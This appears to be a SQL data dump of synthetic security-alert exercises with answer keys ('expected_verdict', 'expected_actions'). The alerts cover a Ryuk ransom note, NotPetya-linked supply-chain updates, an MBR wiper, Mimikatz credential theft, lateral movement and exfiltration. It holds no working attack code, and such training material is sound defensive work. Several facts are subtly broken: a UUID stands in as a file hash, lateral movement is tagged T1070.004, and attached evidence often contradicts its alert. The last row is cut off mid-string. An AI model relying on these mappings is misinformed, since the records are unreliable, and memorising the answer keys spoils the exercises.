(514, 'Ransom Note Deployment', 'high', 'User Reports', 'In the final step of the attack chain, the attacker deployed a ransom note to the affected systems, demanding payment in exchange for the decryption key. This action follows the encryption of critical files across multiple hosts.', 'Impact', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:32:00Z\",\"event_id\":\"1209\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"ransom_note_filename\":\"READ_ME.txt\",\"file_hash\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"message\":\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\",\"host\":\"victim-host-01\",\"malware_name\":\"Ryuk\"}', '2026-01-06 01:34:24', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server for Ryuk ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host identified as victim\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Account used during the attack\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"READ_ME.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Standard ransom note file for Ryuk\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3fa85f64-5717-4562-b3fc-2c963f66afa6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Ryuk 
ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. 
To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. 
To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.129Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"1209\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"ransom_note_filename\\\":\\\"READ_ME.txt\\\",\\\"file_hash\\\":\\\"3fa85f64-5717-4562-b3fc-2c963f66afa6\\\",\\\"message\\\":\\\"Your files have been encrypted. To restore access, send 5 BTC to the following address: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa\\\",\\\"host\\\":\\\"victim-host-01\\\",\\\"malware_name\\\":\\\"Ryuk\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(515, 'Compromised Software Update Detected', 'high', 'Network Traffic Analysis', 'A malicious update for the accounting software \'FinancePro\' was detected being distributed from a trusted update channel, indicating a supply chain compromise. The update includes a known malicious payload linked to the Sandworm group.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.5\",\"file_hash\":\"b84f28c9d5fe3a67b1d6f70a4b1c6e8e\",\"file_name\":\"FinancePro_Update_v4.2.exe\",\"user\":\"jdoe\",\"update_channel\":\"update.financepro.com\",\"action\":\"download\",\"malware_family\":\"NotPetya\"}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Sandworm APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b84f28c9d5fe3a67b1d6f70a4b1c6e8e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"FinancePro_Update_v4.2.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unexpected update file detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 
0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(516, 'MBR Overwriting Activity Observed', 'high', 'Endpoint Detection and Response (EDR)', 'An alert has been triggered due to the detection of destructive malware that targets the Master Boot Record (MBR) of the system. The malware, associated with the Sandworm group, attempts to overwrite the MBR, rendering the system unbootable under the guise of a ransomware attack. Immediate action is required to prevent further damage.', 'Destructive Malware Execution', 'T1490 - Inhibit System Recovery', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:58Z\",\"event_id\":\"EDR-4521\",\"system\":{\"hostname\":\"workstation-12\",\"ip_address\":\"192.168.1.45\",\"os\":\"Windows 10\"},\"user\":\"jdoe\",\"process\":{\"name\":\"malware_payload.exe\",\"path\":\"C:\\\\Windows\\\\Temp\\\\malware_payload.exe\",\"hash\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\"},\"network\":{\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":443},\"action\":\"MBR overwrite attempt\",\"indicator_of_compromise\":{\"file_hash\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\",\"attacker_ip\":\"203.0.113.5\"}}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"3d2e79c1d5d3e6b7a1c3f3da9f481b2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known destructive malware hash associated with Sandworm operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"IPVoid\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous malicious activities linked to Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, 
NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(517, 'Mimikatz Credential Harvesting Detected', 'high', 'Security Information and Event Management (SIEM)', 'The attackers leverage Mimikatz to harvest credentials from compromised systems, preparing for rapid lateral movement across the network.', 'Credential Access', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:33Z\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"jdoe\",\"logon_type\":\"Interactive\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\mimikatz.exe\",\"process_id\":\"5678\",\"hash\":\"6f5902ac237024bdd0c176cb93063dc4\",\"filename\":\"mimikatz.exe\",\"os_version\":\"Windows 10\",\"domain\":\"example.local\"}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with credential theft campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within the organization\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6f5902ac237024bdd0c176cb93063dc4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Executable file commonly used for credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.133Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:22:33Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Logon\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"logon_type\\\":\\\"Interactive\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mimikatz.exe\\\",\\\"process_id\\\":\\\"5678\\\",\\\"hash\\\":\\\"6f5902ac237024bdd0c176cb93063dc4\\\",\\\"filename\\\":\\\"mimikatz.exe\\\",\\\"os_version\\\":\\\"Windows 10\\\",\\\"domain\\\":\\\"example.local\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(518, 'Rapid Lateral Movement Identified', 'high', 'Anomalous Account Activity', 'With credentials in hand, the attackers move laterally across the network, spreading the destructive wiper payload to additional systems.', 'Lateral Movement', 'T1070.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"event_source\":\"authentication_logs\",\"user\":\"jdoe_admin\",\"source_ip\":\"185.199.108.153\",\"destination_ip\":\"192.168.1.101\",\"action\":\"login_success\",\"description\":\"Successful login using compromised credentials.\",\"malicious_file\":\"OlympicDestroyer_v2.exe\",\"file_hash\":\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\"}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"malicious\",\"details\":\"Account used for unauthorized lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OlympicDestroyer_v2.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Destructive malware associated with Sandworm APT.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known wiper 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.135Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:34Z\\\",\\\"event_source\\\":\\\"authentication_logs\\\",\\\"user\\\":\\\"jdoe_admin\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"192.168.1.101\\\",\\\"action\\\":\\\"login_success\\\",\\\"description\\\":\\\"Successful login using compromised credentials.\\\",\\\"malicious_file\\\":\\\"OlympicDestroyer_v2.exe\\\",\\\"file_hash\\\":\\\"e42f3b0f5e9b4d0a82d3b3e1f4a9d6c7\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(519, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP)', 'An unauthorized data exfiltration attempt was detected involving the transfer of sensitive files to an external IP address. The threat actor, identified by the use of known malware hashes and suspicious IP addresses, attempted to leverage their access to exfiltrate critical data before initiating a destructive attack.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"user\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"hash\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"action\":\"upload\",\"protocol\":\"HTTPS\",\"alert_id\":\"DLP-EXFIL-005\",\"description\":\"Detected upload of sensitive data to external IP address\",\"malware_associated\":[\"NotPetya\"]}', '2026-01-06 01:37:06', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with NotPetya malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Filename flagged as containing sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 
1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data to external IP address\\\",\\\"malware_associated\\\":[\\\"NotPetya\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:19.136Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"hash\\\":\\\"b5c0b187fe309af0f4d35982fd961d7e\\\",\\\"action\\\":\\\"upload\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-005\\\",\\\"description\\\":\\\"Detected upload of sensitive data 